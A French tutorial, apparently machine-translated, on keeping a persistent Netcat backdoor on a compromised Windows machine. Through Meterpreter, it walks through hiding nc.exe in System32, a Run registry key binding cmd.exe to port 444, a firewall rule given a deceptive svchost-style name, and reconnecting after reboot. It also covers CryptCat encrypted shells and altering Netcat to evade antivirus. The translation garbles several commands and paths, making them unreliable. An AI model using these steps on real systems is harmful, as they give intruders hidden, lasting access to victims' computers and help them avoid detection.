Agents persistants de Kali Linux Netcat

Agents persistants de Kali Linux Netcat
Dans cet article, nous allons parcourir des choses que vous pouvez faire avec un utilitaire de réseau appelé Netcat, le couteau suisse de l'armée des outils de réseau.

Introduction:

NetCat est un utilitaire réseau qui peut lire et écrire aux ports UDP et TCP. Il est souvent appelé le couteau suisse des outils de piratage car il peut faire plusieurs choses à la fois en tant que client et serveur lors des aventures de piratage. Nous l'utiliserons souvent pour créer des shells de liaison et inversés autour des rapports pour voir ce qui se passe et envoyer des fichiers entre les machines. Shell est une façon de pouvoir interagir avec un ordinateur comme une invite de commande sur Windows ou Terminal dans Linux. Netcat nous permet d'effectuer beaucoup de choses comme les étagères inversées, de communiquer entre deux ordinateurs ou plus et vous permettra d'effectuer une pléthore de fonctions. NetCat est capable de numériser des ports et de se connecter aux ports ouvrir en utilisant ses arguments de commande simples. Il est également capable d'envoyer des fichiers et de fournir une administration à distance via un shell direct ou inversé.

Employant Netcat comme agent persistant:

Netcat est un programme extrêmement polyvalent et utile. J'ai mentionné plus tôt dans cet article qu'il est utilisé pour communiquer entre deux ordinateurs. Il peut également être utilisé si vous souhaitez installer la persistance. Netcat peut être utilisé comme porte arrière. Commençons donc par créer un shell persistant sur le système compromis en utilisant Netcat. Nous utiliserons -nc.exe, comme c'est le nom de l'exécutable. Mais si vous le renomment avant de l'utiliser, minimise les chances de détection. Cependant, même après le renommer un logiciel antivirus peut le détecter. Beaucoup de pirates modifient certains des éléments du code source de Netcat, qui ne sont pas nécessaires et, avant de l'utiliser, le recompiler. Ces modifications rendront Netcat invisible aux logiciels antivirus.

Sur Kali, Netcat est stocké dans les binaires / usr / share / windows. Pour le télécharger sur le système compromis, utilisez la commande à partir de Meterpreter:

$ meterpreter> upload / usr / share / binaries Windows / NC.exe c: \\ windows \\ System32

Il y a beaucoup de fichiers dans ce dossier, pour masquer un fichier dans un système compromis, c'est le meilleur endroit

Vous pouvez également utiliser un protocole de transfert de fichiers trivial si vous n'avez pas de connexion de mètre pour transférer le fichier.

L'étape suivante consiste à configurer le registre afin que vous puissiez lancer NetCAT lorsque le système démarre et assurez-vous qu'il écoute sur le port 444. Utilisez la commande ci-dessous:

$ MeterPreter> Reg setval -k hklm \\ logiciel \\ microsoft \\ windows \\
CurrentVersion \\ run -vv nc -d 'c: \\ windows \\ system32 \\ nc.EXE -LDP 444
-E CMD.exe'

Maintenant que vous avez utilisé la commande mentionnée ci-dessus, utilisez la commande QueryVal suivante pour vous assurer une implémentation réussie du changement dans le registre.

$ meterpreter> reg queryval -khklm \\ logiciel \\ microsoft \\ windows \\
currentverion \\ run -vv nc

Ouvrez un port sur un pare-feu local pour confirmer que le système compromis acceptera les connexions distantes à NetCat en utilisant la commande $ netsh. Pour savoir que le système d'exploitation de la cible a une importance privilégiée. Le contexte de ligne de commande utilisé pour Windows Vista, Windows Server 2008, est

$ netsh advfirewall

Pour les systèmes antérieurs, la commande de pare-feu $ netsh est utilisée. Entrez la commande shell à l'invite de mètre pour ajouter le port au pare-feu Windows local, entrez la règle à l'aide de la commande appropriée. Pour un bon fonctionnement du système, le nom d'utilisateur comme «svchostpasshrough» tout en nommant la règle. Un exemple de commande est indiqué comme suit:

$ C: \ Windows \ System32> NetSh Firewall Ajouter l'ouverture du port
TCP 444 "service de service"

Pour confirmer que le changement a été mis en œuvre avec succès à l'aide de la commande suivante:

$ C: \ Windows \ System32> NetSh Firewall Afficher l'ouverture du port

Après la confirmation de la règle du port, assurez-vous que l'option de redémarrage fonctionne.

Entrez la commande suivante à partir de l'invite de mètre:

$ meterpreter> redémarrer

Entrez la commande suivante à partir d'un shell Windows interactif:

$ C: \ Windows \ System32> Arrêt -R -T 00

Pour accéder à l'écart du système compromis, tapez $ nc à une invite de commande, indiquez la verbosité de la connexion (-v et -vv rapporte des informations de base, respectivement plus d'informations), puis entrez l'adresse IP de la cible et le numéro de port.

$ nc -v 192.168.43.128 444

Malheureusement, Netcat a certaines limites, qui n'y a pas d'authentification des données transmises, et les logiciels antivirus peuvent le détecter. Cependant, le problème de moins de cryptage peut être résolu en utilisant CryptCat, qui est une alternative à NetCat. Pendant la transmission entre l'hôte exploité et l'attaquant, il sécurise les données en utilisant un cryptage Twofish. Il ne sera pas faux de dire qu'il offre une protection raisonnablement forte pour les données cryptées.

Assurez-vous qu'il existe un écouteur prêt et configuré avec un mot de passe fort pour utiliser CryptCAT, utilisez la commande suivante:

$ sudo cryptcat -k mot de passe -l -p 444

L'étape suivante consiste à télécharger CryptCat dans le système compromis et à le configurer pour se connecter avec l'adresse IP de l'écouteur à l'aide de la commande suivante:

$ C: \ Cryptcat -K mot de passe 444

Il est malheureux de dire que Netcat et ses variantes peuvent être détectés par un logiciel antivirus. En utilisant un éditeur hexagonal pour modifier le code source de Netcat, il est possible que Netcat ne soit pas détecté. Mais c'est un long processus d'essai et d'erreur. Une approche plus fiable consiste à utiliser les mécanismes de persistance du cadre Metasploit.

Conclusion:

Netcat est un couteau armée suisse qui est utilisé pour un piratage efficace. Il peut remplir plusieurs fonctions pour accéder au serveur et au client. Cet article vous fournit une brève description de la sfonction et de l'utilisation de NetCAT. J'espère que vous l'avez aimé si cet article vous a aidé, puis le partager avec vos amis. N'hésitez pas à poser des questions sur toutes les requêtes que vous avez concernant Netcat. Vous pouvez également partager votre opinion et plus de détails.